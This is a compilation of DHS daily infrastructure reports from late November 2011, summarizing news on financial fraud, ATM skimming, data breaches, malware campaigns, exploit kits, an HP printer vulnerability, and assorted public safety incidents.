Wednesday, November 30, 2011

Complete DHS Daily Report for November 30, 2011

Daily Report

Top Stories

• A cellphone service that is supposed to grant priority to emergency government and public safety calls failed during the August earthquake that rocked the East Coast, a DHS official said November 28. – NextGov (See item 32)

32. November 28, NextGov – (National) Cellphone emergency call service failed following East Coast quake. A cellphone service that is supposed to grant priority to emergency government and public safety calls failed during the August earthquake that rocked the East Coast, a DHS official said November 28. The Wireless Priority Service, a voice feature that does not require a special cellphone, was overwhelmed by text-messaging traffic in the aftermath of the 5.8 magnitude shaker August 23, said the acting director of the DHS National Communications System. It is widely acknowledged that many Americans were unable to make personal calls for several minutes following the earthquake. DHS officials are working with carriers to modify their circuitry by the time of the Republican and Democratic national conventions late summer of next year, he said. "That is a significant requirement that we must have," he said. He told Nextgov that Alcatel-Lucent's hardware should be fixed by Christmas. Source: http://www.nextgov.com/nextgov/ng_20111128_2122.php

• Researchers found a HP LaserJet printer vulnerability that could allow hackers to remotely control the device to launch cyberattacks, steal data, and even instruct its components to overload until it catches fire. – Softpedia See item 36 below in the Information Technology Sector

Details

Banking and Finance Sector

10. November 29, BankInfoSecurity – (California) Fraud scheme hits grocer. Modesto, California-based grocery chain Save Mart Supermarkets issued a consumer advisory November 23 about card-reader breaches at 20 of its stores. According to a statement posted on Save Mart's Web site, tampered card-readers at self-service checkout lanes in 19 Lucky Supermarkets locations and one Save Mart store were discovered during routine maintenance. The statement did not say when the tampering might have occurred or what method of tampering was used. It is not clear if skimmers were installed, or if the card readers were replaced with readers manipulated to collect details. Save Mart did say, however, that it replaced readers on all of the affected terminals and added additional security to point-of-sale card readers in all of its 234 locations soon after the tampering was discovered. "We are not aware nor have we been notified of any reports that customer accounts were compromised," the company statement said. "The appropriate authorities have been notified of this situation and consumer notices have been posted at credit/debit terminals in the affected stores as well as placed on our Web sites." Source: http://www.bankinfosecurity.com/articles.php?art_id=4280

11. November 28, CNN – (National) Citigroup's mortgage securities fraud settlement with SEC rejected. A judge rejected a proposed $285 million mortgage securities fraud settlement between Citigroup and the Securities and Exchange Commission (SEC) November 28, saying the deal was "neither fair, nor reasonable, nor adequate, nor in the public interest." A judge said that the settlement announced in October 2011, under which Citi neither admitted nor denied the SEC's allegations, deprived the public "of ever knowing the truth in a matter of obvious public importance." He instead ordered Citi to face trial over the allegations in July 2012. A spokeswoman for Citi said the bank was "declining to comment, pending a review of the decision." The SEC has alleged that in 2007, Citi created and sold a mortgage-related collatarized debt obligation, or CDO, called Class V Funding III. After marketing the CDO, Citi then took a short position — or bet against — the security as the housing market deteriorated, bringing in a net profit of $160 million for the bank. Investors, meanwhile, lost more than $700 million. Source: http://www.chicagotribune.com/business/breaking/chi-citigroups-mortgage-securities-fraud-settlement-with-sec-rejected-20111128,0,5534190.story

12. November 28, WDEF 12 Chattanooga – (Georgia) Debit card scam not linked to any local retailers. Hundreds of north Georgia residents found themselves in the middle of a scam the week of November 21. Officials believe the scam started November 23, when many Walker County residents found themselves with a depleted bank account. "We've seen charges made from people's card from Spain to Egypt to Europe to Mexico," a LaFayette Police Department sergeant said. Officials believe this is an elaborate crime ring that used the holiday to take advantage of people's accounts. "We have not tracked this source back to any particular business in our jurisdiction. I can tell you that with absolute certainty," the sergeant said. Officials said about 400 to 500 residents have reported the issue to local banks in the Walker County and LaFayette area. There has also been reports of the same scam in other counties. "There could be as many as 100 victims in the Chattooga County area," the Walker County sheriff said. Officials said the scam starts with the credit card processing company, not a local retailer. The FBI is assisting in the investigation. Source: http://www.wdef.com/news/story/Debit-Card-Scam-Not-Linked-To-Any-Local-Retailers/-hTdSz-59kC2wPBqNRpFYw.cspx

13. November 28, Grand Rapids Press – (Michigan) Grand Rapids-area broker described as 'mini-Madoff' in alleged Ponzi scheme. A Grand Rapids, Michigan stockbroker is facing federal allegations linked to a $6-million Ponzi-style scheme, the Grand Rapids Press reported November 28. The government has filed felony information accusing the broker of mail fraud for sending falsified account statements to clients. The U.S. Securities and Exchange Commission (SEC) earlier filed a civil injunction against the broker and his companies, Wealth Resources Inc. and Wealth Resources LLC, alleging he acted as an unregistered broker and investment adviser to raise funds from at least 20 investors. "Based upon representations made by [the broker] investors gave money to [the man] to place in Wealth Resources LLC and invest on their behalf," an assistant U.S. attorney wrote in court documents. "[He] induced his clients to withdraw money from their retirement accounts, investment accounts, bank accounts and from other sources on the premise that [he] would invest their money into legitimate investment opportunities. However, [he] lied about the success of Wealth Resources LLC, and other investment opportunities that he recommended, and diverted some of his clients’ money for his own use." The attorney said he "fabricated" account statements that led "clients to believe that their investment was safe and growing." The broker was a registered representative of New England Securities from December 1998 to April 2010. When the broker filed for bankruptcy in June 2010, clients filed a complaint to prevent discharge of his $4.3 million debt to them, court records showed. The government said he used some of the money to "make Ponzi-like payments to other customers who requested a return of all or part of their investment." Source: http://www.mlive.com/news/grand-rapids/index.ssf/2011/11/grand_rapids-area_broker_descr.html

14. November 28, Fort Worth Star-Telegram – (Texas) 2 UNT freshmen accused of printing fake money in dorm. Two University of North Texas freshmen were arrested November 7 on suspicion of forgery, and accused of running a counterfeiting operation from a dorm room until a store clerk reported receiving a fake $20 bill to Denton, Texas, police. Denton officers arrested the students after an officer found fake $1 and $20 bills atop a printer in one of their dormitories, police said. The students face a felony charge of forgery, which carries a sentence of 180 days to 2 years in state jail, and a fine of up to $10,000. The case came under police scrutiny when a convenience store clerk reported a questionable-looking $20 bill, a Denton police spokesman said. The investigation led to a search of a student's dorm room which turned up a scanner/printer, and a computer used to print money. "Apparently there was money on top of it that they were still in the process of making money," the Denton police spokesman said. He said the counterfeit bills were passed at area fast-food restaurants and convenience stores. Source: http://www.star-telegram.com/2011/11/28/3556376/2-unt-freshmen-accused-of-printing.html#storylink=omni_popular

15. November 23, Federal Bureau of Investigation – (National) FBI Denver Cyber Squad advises citizens to be aware of a new phishing campaign. The FBI Denver Cyber Squad advised citizens of a new spear phishing campaign involving personal and business bank accounts, financial institutions, money mules, and jewelry stores. The campaign involves a variant of the "Zeus" malware called "Gameover." The campaign features e-mails claiming to be from the National Automated Clearing House Association (NACHA), and advising the user of a problem with an ACH transaction at their bank that was not processed. Users that click on the link are infected with the Zeus or Gameover malware, which can key log as well as steal online banking credentials, defeating several forms of two-factor authentication. After accounts are compromised, the perpetrators conduct a Distributed Denial of Service (DDoS) attack on the financial institution. The belief is the DDoS is used to deflect attention from the wire transfers as well to prevent a reversal of the transactions (if found). A portion of the wire transfers is being transmitted directly to high-end jewelry stores, wherein the money mule comes to the actual store to pick up his $100,000 in jewels (or whatever dollar amount was wired). An investigation has shown the perpetrators contact the high-end jeweler requesting to purchase precious stones and high-end watches. The perpetrators advise they will wire the money to the jeweler’s account and someone will come pick up the merchandise. The next day, a money mule arrives at the store, the jeweler confirms the money has been transferred or is listed as "pending" and releases the merchandise to the mule. Later on, the transaction is reversed or cancelled (if the financial institution caught the fraud in time), and the jeweler is out whatever jewels the money mule was able to obtain. Source: http://www.fbi.gov/denver/press-releases/2011/fbi-denver-cyber-squad-advises-citizens-to-be-aware-of-a-new-phishing-campaign?utm_campaign=email-Immediate&utm_medium=email&utm_source=denver-press-releases&utm_content=51037

For another story, see item 38 below in the Information Technology Sector

Information Technology

35. November 29, The Register – (International) 13 million gamers in ID theft scare after Nexon breach. An estimated 13 million gamers have been left at greater risk of ID theft following a breach at gaming firm Nexon. Data including names, usernames, encrypted resident registration numbers, and password hashes was exposed as a result of the breach at Nexon, which maintains the popular online role-playing game, Maple Story. The data breach followed a hack on a backup server for Maple Story late the week of November 21. Details of the 5 million customers of other games maintained by Nexon were not exposed. Nexon promised to bolster its security in the wake of the attack, the Korean Herald reports. In addition, it is offering game items to gamers who change their passwords. Source: http://www.theregister.co.uk/2011/11/29/nexon_data_breach/

36. November 29, Softpedia – (International) HP printers may be remotely set on fire, researchers say. Researchers at Columbia University in New York City found a HP LaserJet printer vulnerability that could allow a hacker to remotely control the device to launch cyberattacks, steal data that is being printed, and even instruct its mechanical components to overload until it catches fire. According to MSNBC, the researchers revealed the flaw they found does not affect only HP printers, but also other devices utilized by millions of individuals and companies that so far were considered to be safe. In the case of the HP printers which they thoroughly tested, the researchers relied on the fact remote software updates are not checked for signatures or certificates when they are being installed. In another demonstration, by sending a specially crafted print job, they were able to inject a code that would automatically scan printed documents for sensitive information, transmitting the data to a Twitter feed. They showed an infected computer could instruct the printer’s fuser, the one used to dry off the paper, to continuously heat up until the device self-destructs or, if it lacks a fuse, to set itself on fire. They also proved a hijacked printer could act as a gate-opener for a full-effect attack on a company network. They even made a demo from computers running Mac and Linux operating systems. HP representatives argue the situation might not be all that disastrous, claiming their newer models check for signatures while performing firmware updates. However, they are currently investigating the issue to determine exactly what is affected and what can be done about it. Even though later printer models should be more secure, the researchers claim one of the printers used in their tests was purchased not long ago. Source: http://news.softpedia.com/news/HP-Printers-May-Be-Remotely-Set-On-Fire-Researchers-Say-237254.shtml

37. November 29, Softpedia – (International) Russian spammers rely on new techniques to mask phone numbers. Some spam messages contain phone numbers instead of links that point to locations where different products are advertised. To make sure they successfully avoid spam filters, Russian spammers devised new ways to keep phone numbers secret. Symantec researchers reveal the large number of methods utilized by Russian spammers to list phone numbers in e-mail messages without raising the suspicion of any anti-spam solution. One of the simpler methods implies placing symbols between the figures that compose the number. In some cases, Russian characters that resemble figures will be utilized to replace some numbers. Also, in some scenarios, the numbers were actually spelled in Russian words. One final strategy involves writing the area code with the actual name of the city it represents. Source: http://news.softpedia.com/news/Russian-Spammers-Rely-on-New-Techniques-to-Mask-Phone-Numbers-237269.shtml

38. November 29, The Register – (International) Danger worm hijacks Facebook accounts to inject banking trojan. A dangerous worm is using Facebook to spread itself by posting malicious links on the social networking Web site that point to malware-tainted sites loaded with a variant of the Zeus banking trojan as well as other pieces of malware. The malware uses stolen Facebook account credentials to log into compromised accounts and post links, according to security researchers at CSIS in Denmark, who were the first to detect the threat. The malicious links generated by the worm pose as links to a photo file posted by the account-holder's friend or online acquaintance. In reality, the file is a booby-trapped screensaver file with a .jpg file extension. Users have to download and open the file but if tricked into doing so, the consequences can be serious –- especially since anti-virus detection rates are quite low. CSIS added the worm is also using other domains to spread. Source: http://www.theregister.co.uk/2011/11/29/facebook_worm_spreads/

39. November 29, Help Net Security – (International) FakeScanti rogue sends users to download additional fake AV solution. The Blackhole exploit kit has been getting a lot of attention recently, because it is continually updated with exploits for various flaws in popular software, and can deliver practically any malware the attackers want it to. Among those malware are rogue AV solutions such as those belonging to the FakeScanti malware family. One of the variants — named "AV Protection 2011"— can modify the infected computer's HOSTS file (the file that allows the system to connect hostnames to IP addresses) so that when the user tries to visit the Google Search engine, Facebook, or Bing, he/she is redirected to a page hosted in Germany that serves up another variant of the same family. The hijacking of the HOSTS file is not unusual behavior when it comes to worms and backdoors, but it not often seen in rogue AV solutions, said a GFI researcher. The technique is also often used by phishers for seamlessly redirecting users to phishing pages when they try to visit legitimate ones. Source: http://www.net-security.org/malware_news.php?id=1920

40. November 28, H Security – (International) Google+ security attracts praise and criticism. Security researchers at University College London subjected Google+ to a first IT security analysis, the main focus of which was on privacy. The currently preliminary results are ambivalent: the researchers commended new functions which improve networking security among friends, but they have also highlighted several potentially problematic details. Among these concerns is the way in which Google+ currently handles images. The researchers showed that photos uploaded to the network retain their metadata. However, they say the service does not inform users about this. Another problem area is the Google+ "About" section. There, Google is apparently prompting users to list previous addresses, previous names, and their maiden name. The researchers said this information could be particularly useful to identity thieves. The researchers commended the fact that Google+ uses SSL encryption by default, for the entire Google+ network connection. Facebook only uses this encryption for its lo-gin page, unless a user explicitly enables the security feature. The researchers concluded that, therefore, Google+ sessions offer better protection against "man-in-the-middle" attacks. Source: http://www.h-online.com/security/news/item/Google-security-attracts-praise-and-criticism-1386437.html

For another story, see item 15 above in the Banking and Finance Sector

Communications Sector

41. November 28, Internet Retailer – (National) The Thanksgiving weekend brings site headaches for multiple online retailers. PC Mall Inc. and Crutchfield Corp. were among the retailers experiencing significant downtime on their e-commerce sites November 28, according to Web site, performance-monitoring firm Catchpoint Systems Inc. The e-commerce site operated by PC Mall had suffered 77 minutes of downtime as of noon Eastern time, Catchpoint said. The Crutchfield site had 60 minutes of downtime. Other e-commerce site also experienced problems over the holiday weekend, according to a report from Web site performance monitoring firm AlertBot. The site operated by American Eagle Outfitters Inc. was down for a little over 8 hours between about 9 p.m. Eastern time November 23 and November 28, an AlertBot sales and marketing manager said. "An error message appeared numerous times over the Thanksgiving break," he said. The e-commerce site operated by Target Corp. experienced loading problems for more than 2 hours November 25, the day after Thanksgiving — the latest difficulty for the redesigned site since its introduction in August. The problems occurred between 3:30 p.m. and 4:10 p.m. and 5:10 p.m. and 6:45 p.m. Eastern time November 25, AlertBot said. Source: http://www.internetretailer.com/2011/11/28/thanksgiving-weekend-brings-multiple-site-headaches

For more stories, see item 32 above in Top Stories and items 38 and 40 above in the Information Technology Sector

Tuesday, November 29, 2011

Complete DHS Daily Report for November 29, 2011

Daily Report

Top Stories

• Police broke up a fight in a Washington, D.C. restaurant November 27, only to have the melee erupt into gunfire and knife-play that left one dead and five wounded. – United Press International (See item 18)

18. November 27, United Press International – (District of Columbia) 1 dead, 5 wounded in melee shooting. Police broke up a fight in a Washington, D.C. restaurant November 27, only to have the melee erupt into gunfire and knife-play that left one dead and five wounded. The victim who died was identified as a 34-year-old, the Washington Post reported. One of the wounded, who was at the Heritage India restaurant in Dupont Circle celebrating a friend’s birthday when the violence broke out about 2:45 a.m., told the newspaper he and a lifelong friend crossed the street with another person to escape the violence. One other person was shot, and three people were stabbed. All of the victims live in Maryland, police said. No arrests were made and investigators were trying to determine what led to the initial fight, the Post said. Source: http://www.upi.com/Top_News/US/2011/11/27/1-dead-5-wounded-in-melee-shooting/UPI-32201322454882/?spt=hs&or=tn

• Federal officials entered discussions with W.R. Grace & Co. over how to clean up asbestos washing into the Kootenai River from a vermiculite mine that the company owns in Libby, Montana. The mine has created dust that killed about 400 people and sickened thousands. – Associated Press (See item 21)

21. November 26, Associated Press – (Montana) As asbestos washes into Montana river, EPA and W.R. Grace negotiate Libby mine site cleanup. Federal officials have entered discussions with W.R. Grace & Co. over how to clean up asbestos washing into the Kootenai River from a deadly vermiculite mine the company owns in Libby, Montana. More than 20 years after the Maryland-based Grace closed the above-ground mine, tests results provided by regulators show high amounts of asbestos pouring from creeks inside the mine site during the annual spring snowmelt. The creeks drain into the Kootenai upstream of Libby, where an estimated 400 people have been killed and 1,750 sickened by asbestos dust released when vermiculite ore was mined to make residential insulation. The consequences of inhaling Libby’s potent asbestos fibers are well documented, but much less is known about the dangers of ingesting the fibers and their potential harm to wildlife. U.S. Environmental Protection Agency (EPA) regulators said they are trying to gauge the risk from the water-borne asbestos and have yet to determine how far downriver the contamination might extend. Some Libby residents worried the contaminated water could prolong a cleanup that has cost more than $370 million over the past decade. At the mine site, one water sample taken from Rainy Creek in May showed 276 million asbestos fibers per liter of water. Several miles downstream, water pumped from the Kootenai is used in the cleanup to suppress dust and for equipment decontamination. EPA officials said 10 samples taken in recent months did not detect asbestos in the pumped water. The Kootenai River is not the drinking water source for Libby, nor are any of the creeks that come from the mine, however, the test results from Rainy Creek are “huge” and could pose risks to populations that live anywhere along the Kootenai between Rainy Creek and the Pacific Ocean, said a member of the Libby Area Technical Advisory Group, an EPA-funded cleanup oversight panel. State officials said berms along the creeks, more vegetation, and other measures could be used to stop asbestos-tainted sediment from entering the water. Source: http://www.therepublic.com/view/story/9a322b2b8ebb442ca4dea5fceb4e5379/MT--Libby-Mine/

Details

Banking and Finance Sector

9. November 28, Sofia News Agency – (International) Bulgaria: Sofia airport customs officers seize flash drives containing credit card data. Customs officers at Sofia Airport in Bulgaria have seized USB memory sticks containing credit card data, Bulgaria’s Customs Agency reported November 28. The portable devices were found to belong to two Bulgarian citizens arriving from a Madrid flight. The passengers were coming from Lima, Peru, and were selected under a risk analysis method in the sphere of cocaine trafficking. In the course of the inspection and the subsequent questionings, the two passengers were nervous and offered contradicting and mixed-up explanations about their trip, which caused the customs officers to dig deeper. Although the data stored on the flash drives was encrypted, the customs authorities were able to identify data from numerous credit cards of American and European tourists residing in Peru, as well as instructions regarding the ownership of the cards and the methods for withdrawing the money. The customs officers also seized the two men’s laptops. Source: http://www.novinite.com/view_news.php?id=134328

10. November 22, KOMO 4 Seattle – (Washington) Bellevue stockbroker pleads guilty in $7 million fraud scheme. A Bellevue, Washington stockbroker pleaded guilty November 21 to wire fraud in federal court, admitting he defrauded at least 10 clients of as much as $7 million. According to U.S. district court records, he sent phony statements to his clients that hid significant losses and commissions. He also charged huge commissions, transferring hundreds of thousands of dollars to his personal checking account to pay for his own credit card bills, food, and entertainment, as well as business expenses such as payroll, fees, and taxes, court records show. The man now faces more than 6 years in federal prison under the plea deal with prosecutors. The amount of restitution will be determined at his sentencing February 17. A spokesperson for the U.S. attorney’s office said the man owned and operated Black Diamond Capital Management, LLC, and Black Diamond Securities, LLC. In the plea agreement, the man admitted some of the victims invested with him when he was working for a Seattle brokerage firm. Source: http://www.komonews.com/news/local/Bellevue-stockbroker-pleads-guilty-to-7-million-fraud-scheme-134351898.html

11. November 22, Nanuet Patch – (New York) Five charged with involvement in countywide ATM skimming operation. Police warned holiday shoppers to be careful while using Westchester, New York ATMs after uncovering an elaborate ATM skimming scheme they said netted a group of thieves about $1 million over the last few months, the Nanuet Patch reported November 22. A joint task force involving the Westchester County Police, U.S. Secret Service, and nine local police departments worked together to make five arrests. The scheme involved the placement of “dip readers,” which read ATM cards when they are placed in a machine, paired with a small pin-hole camera used to obtain card-holders’ PIN numbers, police said. The obtained personal information was then copied onto blank cards and used to make withdrawals at another bank. Police believe those arrested are low-level criminals working for a larger organized crime group. ATM skimmers have been found in ATMs throughout the New York Metro area. The Bronxville police chief said 330 accounts were compromised at a Chase branch on Parkway Road in Bronxville in October. “On two consecutive Sundays we lost $330,000 as a result of the skimmers,” he said. Police said none of those arrested are from Westchester County, and that some are not U.S. citizens. All of the suspects are of Eastern European descent. All have been charged with possession of forgery devices, a felony. Source: http://nanuet.patch.com/articles/5-arrested-in-county-wide-atm-skimming-operation#video-8519476

12. November 22, Bloomberg – (National) Bank of America settles Countrywide fraud claims by Calpers. Bank of America Corp. settled securities fraud claims by a group of Countrywide Financial investors including the California Public Employees’ Retirement System (Calpers) that opted out of a $624 million class-action settlement in 2010, Bloomberg reported November 22. A confidential settlement has been reached with all defendants except KPMG LLP, Countrywide’s former auditor, lawyers for the plaintiffs said in a filing November 21 in federal court in Los Angeles. Countrywide, acquired by Bank of America in 2008, was accused of misleading shareholders about its finances and lending practices. The plaintiffs, which also include funds managed by BlackRock Inc., T. Rowe Price Group Inc., and TIAA- CREF are the largest group of those who rejected the 2010 settlement, saying the terms were inadequate. The settlement leaves two other lawsuits by investors that opted out of the 2010 settlement still pending in Los Angeles federal court, one by a group of Michigan public pension funds, and one by the Fresno County Employees Retirement Association. A group of Oregon funds that opted out filed a lawsuit in January in Oregon state court. Calpers, the largest U.S. public pension fund with $227.5 billion in assets, and the other investors did not specify their alleged damages in the complaint filed July 28. Source: http://news.businessweek.com/article.asp?documentKey=1376-LV2UVS6JTSEC01-7TUFFRCEG9OTQCC2147KJ873QM

Information Technology

28. November 28, CNN – (International) 150 domain names shut down in probe of counterfeit goods. U.S. officials used Cyber Monday (November 28) to announce court orders shutting down 150 domain names of commercial Web sites they say were selling “many millions” of dollars worth of counterfeit goods. Sports jerseys and uniforms, DVDs, shoes and handbags, golf sets, and exercise equipment were among the more popular purchases of “knock off” versions of name brand products, officials said. Investigations show the majority of those engaged in defrauding rights-holding companies and consumers are from China, but the phony goods are also produced in other countries, according to top law enforcement officials. The officials said they conduct undercover purchases with the help of legitimate rights holders to confirm the goods are bogus. They acknowledge the operators of the Web sites are beyond the reach of U.S. agents, and when the sites selling counterfeit goods are shut down, the same criminal enterprises sometimes change domain names and continue to prey on customers. The Immigration and Customs Enforcement agency, the FBI, and U.S. attorney offices cooperated in the investigation, dubbed Operation In Our Sites. The operation they announced November 28 is designed in part to educate consumers to be wary of Web sites that appear to be offering name-brand products at substantially reduced prices. Authorities said they are unable to provide estimates of losses, but are concerned some of the millions of dollars in proceeds may end up in the hands of organized crime rings. Source: http://www.cnn.com/2011/11/28/tech/websites-counterfiet-goods/index.html?hpt=hp_t3

29. November 28, Softpedia – (International) BlackHole kit enhanced with new Java exploit. A security researcher discovered a new exploit kit that relies on a recently patched security flaw present in Java, being packaged with BlackHole. It appears all the versions of Oracle’s Java are susceptible to the attack, except for the latest variants, but considering many do not rush to update these components, the exploit could be used successfully against many devices. Also, these means of attack can be easily turned into automated tools, which once placed on a Web site, can infect the machines of unsuspecting Internet users without much effort. The Java exploit works on most browsers, except for Google Chrome, which for some reason often mitigates attacks launched with the new package. The security journalist also believes that, theoretically, such an attack can also work against Mac OS X operating systems, but so far it has only been tested on Windows platforms. The hacker that advertised the newest Java exploit is giving it away for free to customers that already purchased the BlackHole kit, but for newcomers, the price is around $4,000, plus the cost of the Blackhole license. Source: http://news.softpedia.com/news/BlackHole-Kit-Enhanced-With-New-Java-Exploit-236928.shtml

30. November 27, TheDomains.com – (International) 101Domain.com suffers security breach. 101Domain.com appeared to suffer a security breach that “may have resulted in unauthorized access to your personal information and possibly payment information.” According to Webhosting.info, 101domain.com has about 10,000 domain names under management. A message by 101Domain.com to its customers explains: “We need to make you aware of a security breach that may potentially have affected your account. We were recently informed by one of our vendors that some of its systems, and those of a few of its customers, including 101domain.com, were compromised to varying degrees by a phishing attack. Although there is no direct evidence that your information was stolen and we have received no customer complaints, this attack may have resulted in unauthorized access to your personal information and possibly your payment information.” Source: http://www.thedomains.com/2011/11/27/101domains-com-suffers-securty-breach/

31. November 25, Infosecurity – (International) BEAST-driven SSL attack not as bad as it seems claims Context. Researchers at Context Information Security are playing down the level of risk to enterprises caused by the BEAST — Browser Exploit Against SSL/TLS — that was identified by researchers in late September. As previously reported, the researchers said they found a way of breaking the SSL/TLS encryption that is widely used to guarantee the reliability and privacy of data exchanged between Web browsers and servers. After analyzing the researcher’s findings, Context said hackers are very unlikely to use the complex attack methodology. The company also provided advice on how to further reduce risk. According to Context’s research and development manager, developers can increase complexity and mitigate the risk of malicious content being injected within the same origin by setting the HTTPOnly property that prevents applets or JavaScript to gain access to the cookie and prevent session hijacking. Against this backdrop, Context’s research team argues that — in terms of risk — the BEAST attack is similar to not setting the HTTPOnly property on cookies, which is something that is not unusual among Web sites. Source: http://www.infosecurity-magazine.com/view/22287/beastdriven-ssl-attack-not-as-bad-as-it-seems-claims-context/

For more stories, see items 9 above in the Banking and Finance Sector and 32 below in the Communications Sector

Communications Sector

32. November 27, San Jose Mercury News – (International) Spotify music service resumes after login problems for users in U.S. and Europe. Users of the Spotify streaming music service were again able to log in the afternoon of November 27 after an outage that lasted several hours and affected users in the United States and Europe. The company did not explain what went wrong, but said in a tweet about 3 p.m. Pacific time that it had identified the problem. Beginning at some point before 1 p.m. Pacific time November 27 some Spotify users trying to log in to the popular music streaming service were greeted with error messages, sparking a flurry of tweets complaining the company was not keeping users informed. Spotify’s service status page reported “All systems are up and feeling jolly good’’ as of 1 p.m. Pacific time. But users trying to log in via the desktop or mobile client were receiving 404 errors. An attempt to log into an account on the Spotify.com Web site generated the error message: “Service Temporarily Unavailable. The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.” Spotify users from Spain, France, the United Kingdom, and the United States took to Twitter to complain. Source: http://www.mercurynews.com/business/ci_19421484?source=rss

Monday, November 28, 2011

Complete DHS Daily Report for November 28, 2011

Daily Report

Top Stories

• U.S. and Philippine authorities arrested four members of a terrorist-funded hacker collective suspected to have hacked, and caused millions in damages to wireless provider AT&T. – Softpedia See item 35 below in the Communications Sector

• Shoppers looking for deals November 24 and 25 ran into numerous problems, with 20 injured by pepper spray at a Wal-Mart in Porter Ranch, California, and several others shot in parking lots. – Los Angeles Times (See item 39)

39. November 25, Los Angeles Times – (California; South Carolina) Shootings, pepper-spray attack mar Wal-Mart Black Friday sales. As shoppers converged on retailers around the country looking for Black Friday deals November 24 and 25, authorities reported scattered problems. In Porter Ranch, California, a woman pepper sprayed customers at a Wal-Mart in what authorities said was a deliberate attempt to get more “door buster” merchandise. In San Leandro, California, a Wal-Mart shopper walking to his car was shot and wounded in a suspected robbery early November 25. Another shooting was reported at a parking lot next to a Wal-Mart in South Carolina, also a suspected robbery attempt. Officials told WMBF 32 Myrtle Beach, they believe the robbery was tied to Black Friday. At Porter Ranch, 20 customers, including children, were hurt in the 10:10 p.m. incident, officials said. Shoppers complained of minor skin and eye irritation, and sore throats. The woman used the spray in more than one area of the Wal-Mart “to gain preferred access to a variety of locations in the store,” said a Los Angeles fire captain. Police were searching for the woman but said they have had trouble getting a clear description of her. Black Friday sales began at the Wal-Mart at 10 p.m. Source: http://latimesblogs.latimes.com/lanow/2011/11/wal-mart-black-friday-marred-by-shootings-pepper-spray-attack-.html

Details

Banking and Finance Sector

9. November 25, Help Net Security – (International) ‘PayPal email address change’ phishing scheme doing rounds. PayPal users have been targeted again as e-mails supposedly sent by the online payment company urge them to fill out a form with their personal and financial information to prevent the suspension of their accounts, Help Net Security reported November 25. With “You have changed your PayPal email address” in the subject line, the sender attempts to convince the recipient that someone has accessed their account and changed the e-mail address. To “keep the original email and restore their PayPal account,” the users must fill out an attached Personal Profile Form - PayPal-.htm form. For everything to go smoothly, the sender also “helpfully” notes “the form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9).” But for those who fall for this scam, the submitted information gets sent directly to the phishers, Sophos points out. Source: http://www.net-security.org/secworld.php?id=12003

10. November 23, Darien Times – (Connecticut; Massachusetts; Rhode Island) Three indicted for pinhole camera ATM scam. Police in Darien, Connecticut, arrested two more people in connection to an ATM skimming scam at the Bank of America in June, the Darien Times reported November 23. A New York resident was previously arrested in June. Assisted by the Connecticut Financial Crimes Task Force and the Secret Service, Darien Police connected the crime in Darien to two New York residents. On November 15, a federal grand jury handed down an indictment, charging the three New York residents with conspiracy, bank fraud, and identity theft offenses related to their alleged participation in the scheme across southern New England. The indictment claims, between February 2011 and July 2011, the three conspirators and others conspired to install skimming devices on ATMs at 11 banks and one credit union in Connecticut, Massachusetts, and Rhode Island. The co-conspirators used the stolen information captured by the skimming devices and pinhole cameras to create counterfeit bank cards that allowed them to withdraw funds from the customers’ accounts. One of the conspirators is familiar to law enforcement and perpetrated similar crimes in Massachusetts, Connecticut, and Rhode Island, police said. Police believe he is responsible for 26 similar incidents in the same states. He has been detained in state custody since his arrest in Darien June 20. The other two men were arrested November 2 and November 4. Both are detained in federal custody. The charges of conspiracy to commit bank fraud and bank fraud carry a maximum prison sentence of 30 years and up to $1 million in fines, on each count. The charge of aggravated identity theft carries a mandatory prison sentence of 2 years, which must be imposed consecutively to a sentence imposed on any other count of conviction. Source: http://www.darientimes.com/news/darien-features/local-news/5001890.html

11. November 22, CNNMoney – (National) FDIC’s list of problem banks shrinks. The number of banks at risk of failing fell in the third quarter of 2011, marking the second straight quarterly decline, according to a government report issued November 22. Banks deemed troubled by the Federal Deposit Insurance Corporation (FDIC) dropped by 21 to 844, the agency said in its quarterly survey. The so-called problem bank list is comprised of institutions considered most likely to fail, though few actually reach that point. Only 26 of the nation’s 7,436 banks failed in the quarter, 15 fewer than in 2010. And so far in 2011, only 90 banks have failed, compared with 149 at this time in 2010. The FDIC’s report also showed the banking sector generated the highest profit levels since the second quarter of 2007 — before the financial crisis. The report said 14.3 percent of institutions reported a net loss during the third quarter, the smallest proportion since the first quarter of 2008. Banks earned nearly $35.3 billion in the third quarter, according to the FDIC, up from $23.8 billion from the same quarter in 2010. Source: http://money.cnn.com/2011/11/22/markets/fdic_bank_list/

Information Technology

32. November 25, Softpedia – (International) Android monitoring software hides SMS trojan. Kaspersky Lab experts came across a legitimate application used for monitoring and managing SMSs, calls and Internet traffic on an Android smartphone that can masquerade a malicious Trojan once it lands on a device. The Trojan sends messages to premium rate numbers. The application targets users from countries such as Belgium, France, Switzerland, Luxemburg, Germany, Spain, and Canada, which means the cybercriminals moved their operations from China and Russia to Europe and North America. Upon closer inspection, the app hosted on the Web as SuiConFo, was hiding a SMS trojan identified as Trojan-SMS.AndroidOS.Foncy, which sends four short messages to premium rate numbers. To make the software as legitimate looking as possible, its creators made sure an icon appears in the phone’s menu, but once it is launched, an error pops up, claiming the Android version is not compatible. Right after the error, the trojan will use two public methods to determine the ISO country code of the SIM card. Based on this code, it will send the four MSs to one of eight locations. The malware will not only send short messages, but it will also hide incoming SMSs from certain numbers. This is done to ensure reply messages received from premium numbers are not seen by the victim. The virus is programmed to send alerts to a French cell phone number, based on the replies sent by the premium numbers so the developers are aware of the number of victims. Because such trojans can generate a considerable income, it is likely these operations will be extended to affect citizens of other countries. Source: http://news.softpedia.com/news/Android-Monitoring-Software-Hides-SMS-Trojan-236641.shtml

33. November 25, H Security – (International) Paragon programming language identifies security vulnerabilities. A researcher from Sweden’s University of Gothenburg developed a programming language that can be used to identify security vulnerabilities in the information flow of applications as they are being developed. Paragon was created as part of his dissertation entitled “Practical, Flexible Programming with Information Flow Control.” It is an extension to the Java programming language and, according to the researcher, can easily be integrated into existing Java applications. Source: http://www.h-online.com/security/news/item/Paragon-programming-language-identifies-security-vulnerabilities-1385148.html

